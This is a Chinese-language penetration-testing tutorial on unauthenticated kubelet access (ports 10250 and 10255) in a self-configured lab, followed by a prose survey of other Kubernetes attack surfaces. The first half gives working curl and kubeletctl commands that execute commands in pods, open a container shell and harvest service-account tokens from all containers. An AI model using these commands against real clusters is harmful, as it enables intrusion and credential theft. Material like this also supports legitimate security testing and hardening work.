在Kubernetes集群架构中，每个Node节点均运行着一个核心组件——Kubelet进程，该进程扮演着关键的角色，负责接收并执行由Master节点分发至本节点的任务指令，同时承担对Pod及其内部容器的生命周期管理。具体来说，Kubelet对外暴露了三个关键端口：10250端口用于提供经过认证和授权的API接口；10255端口开放了只读API服务，无需额外授权即可访问；而10256端口则服务于健康检查API。

尤其值得关注的是10255端口的只读API服务，虽然其设计初衷是为了提高集群状态信息的透明度与可观察性，但攻击者可能利用这一特性无权限限制地获取到包括Node、Pod的IP地址信息、挂载资源情况以及环境变量等敏感配置详情。这些信息对于攻击者而言，具有极高的价值，能够帮助他们深度理解业务场景构建及集群网络的整体拓扑结构，从而为进一步的潜在攻击行为锁定目标与路径。因此，针对10255端口的安全策略优化显得尤为重要，以防止未经授权的信息泄露风险。

关于Kubelet API官方并未提供文档，更多接口可在Kubelet源码中挖掘。一些有用的路径：

10250端口未授权访问

10250的端口当前版本中默认需要认证

但在老版本的K8s集群中或在用户权限(system:anonymous)被错误配置的情况下，可以尝试直接通过10250端口下发指令。

编辑 kubelet 的配置文件 /var/lib/kubelet/config.yaml （默认位置）并进行以下更改：

1. 设置authentication：anonymous：enabled为true（默认是false）

2. 设置authorization：mode为AlwaysAllow（默认是Webhook）

重启kubelet服务

现在可以远程访问了

利用返回的信息执行命令

curl -XPOST -k "https://192.168.159.236:10250/run/kube-system/kube-proxy-ccqvn/kube-proxy" -d "cmd=hostname“

由于一些 API 命令与curl一起使用时比较复杂，我们使用一个更方便的客户端kubeletctl

项目地址：https://github.com/cyberark/kubeletctl

下载并安装

curl -LO https://github.com/cyberark/kubeletctl/releases/download/v1.9/kubeletctl_linux_amd64 && chmod a+x ./kubeletctl_linux_amd64 && mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl

接下来我们使用这个工具对kubernetes集群进行发现发现、侦察、远程代码执行

发现：发现10250端口

搜索打开 kubelet 端口的节点，可以在特定子网上使用kubeletctl scan命令

侦察：列出节点上的pods

确定可访问的 kubelet API 后，我们需要检查可以提取哪些信息。最常见和最重要的信息是/pods端点，它将为我们提供 Pod 列表。

容器内的远程代码执行

一旦我们获得了 Pod 和容器的详细信息，我们就可以在它们内部运行命令。kubeletctl添加scan rce参数来单独检查每个容器，以查看是否可以在其中运行命令。

执行命令

kubeletctl exec "hostname" -p kube-proxy-ccqvn  -c kube-proxy  -n kube-system --server 192.168.159.236

进入容器

kubeletctl exec sh  -p kube-proxy-ccqvn  -c kube-proxy  -n kube-system --server 192.168.159.236

可以在节点内的所有 pod 上运行命令，而无需单独指定每个 pod 和容器

kubeletctl run "uname -a" --all-pods  --server 192.168.159.236

攻击者在 Kubernetes 环境中最常见的事情之一就是搜索令牌，因此有一个特定的命令可以查看所有容器中的令牌

kubeletctl scan token   --server 192.168.159.236

10255端口未授权访问

默认情况下k8s集群不对外开放10255端口，我们在配置文件config.yaml中添加readOnlyPort: 10255

重启kubelet服务

systemctl restart kubelet

现在可以访问集群的10255端口

10255端口是只读的，只能获取信息，无法对pod执行命令，读取token等操作。

获取pods信息：

kubeletctl pods   --server 192.168.159.236 --http --port=10255

执行读取token的命令没有返回结果

kubeletctl scan token   --server 192.168.159.236 --http --port=10255

每个主机操作系统均存在一个攻击界面，该界面构成了攻击者可能利用的各种潜在漏洞和途径的整体集合。例如，任何暴露在网络环境中的服务都会为攻击者提供一个潜在的切入点，并进一步扩展了系统的攻击界面。攻击界面的扩大意味着攻击者更有可能发现并利用这些漏洞，从而对主机操作系统及其承载的容器应用构成威胁，导致系统安全受到侵害。

在Kubernetes（K8s）环境中，黑客通常会针对Node、Pod及Service三个网络层级进行深入的存活探测与端口扫描活动，旨在全方位寻找可利用的安全缺口。他们不仅从K8s内置服务的层面出发，还会挖掘用户部署的应用程序以及第三方K8s插件等多维度的潜在攻击面。此外，黑客一旦定位到Node的IP地址，将尝试访问Kubelet API接口，以期获取详尽的Pod资源拓扑信息，进而为下一步的潜在攻击行动奠定基础。

可使用上文提到的kubeletctl进行扫描。

Kubernetes Dashboard是一个功能全面的WEB界面工具，旨在简化并增强用户对Kubernetes集群资源（例如：Deployment、Job、DaemonSet等）的可视化创建、配置更新与运维管理能力。其部署方式会依据具体的云服务提供商及用户的个性化配置进行调整，在遵循官方标准部署流程时，Dashboard通常会在集群内部署独立的Namespace、Service、Role以及ServiceAccount等核心组件以实现安全隔离和权限控制。例如，在阿里云容器服务中所提供的Kubernetes Dashboard解决方案即采取了上述部署策略，确保用户能够在具备高度可控性和安全性的环境下，高效地通过图形化界面操作和管理Kubernetes各类资源对象。

在Kubernetes环境中，默认配置下Pod之间具备网络通信能力。一旦攻击者成功侵入某一个Pod，他们能够通过实施信息收集和内网扫描等手段，定位到Kubernetes Dashboard所关联的Service地址。进一步地，攻击者可能会利用与Kubernetes Dashboard服务关联的预设Service Account进行身份验证及授权操作，从而执行潜在的恶意行为。

在云原生环境下的容器化应用部署中，服务系统频繁与多元化的内部和外部API进行集成交互。攻击者可能通过恶意手段探测并收集这些API的认证凭据，或探查是否存在未授权访问的漏洞，以此为跳板来进行深度攻击前的准备工作。可参考之前文章里面的AK泄露利用方式。

同时，在某些云服务提供商所提供的Container-as-a-Service (CaaS) 或Serverless架构容器场景下，为了增强用户与底层云基础设施间的通信便利性，厂商会内嵌专用Sidecar容器或者通过挂载特定API至业务逻辑容器的方式，提供额外的管理接口。然而，这些特设的接口在带来便捷性的同时，也可能成为攻击者实施信息搜集战略时的关键突破口。

在Kubernetes 服务暴露机制中，主要有三种模式：ClusterIP、NodePort以及LoadBalancer。其中，LoadBalancer模式通常与云服务提供商的负载均衡产品深度集成，从而提供了强大的流量审计和管理功能。

针对混合部署场景，即K8s集群与虚拟机(VM)共存于同一内网环境时，若攻击者利用非容器化部分的潜在安全漏洞突破防线进入内网，可能会通过NodePort服务实现横向渗透。在快速迭代业务环境中，相比于动态分配端口的ClusterIP服务，NodePort服务由于其端口固定的特性，更可能被选作穿越网络边界管控策略及防火墙限制的稳定控制通道。

默认配置下，K8s集群为NodePort服务分配的端口号范围是30000至32767。参考https://www.cnblogs.com/scajy/p/15493248.html配置实现使用NodePort对外暴露应用。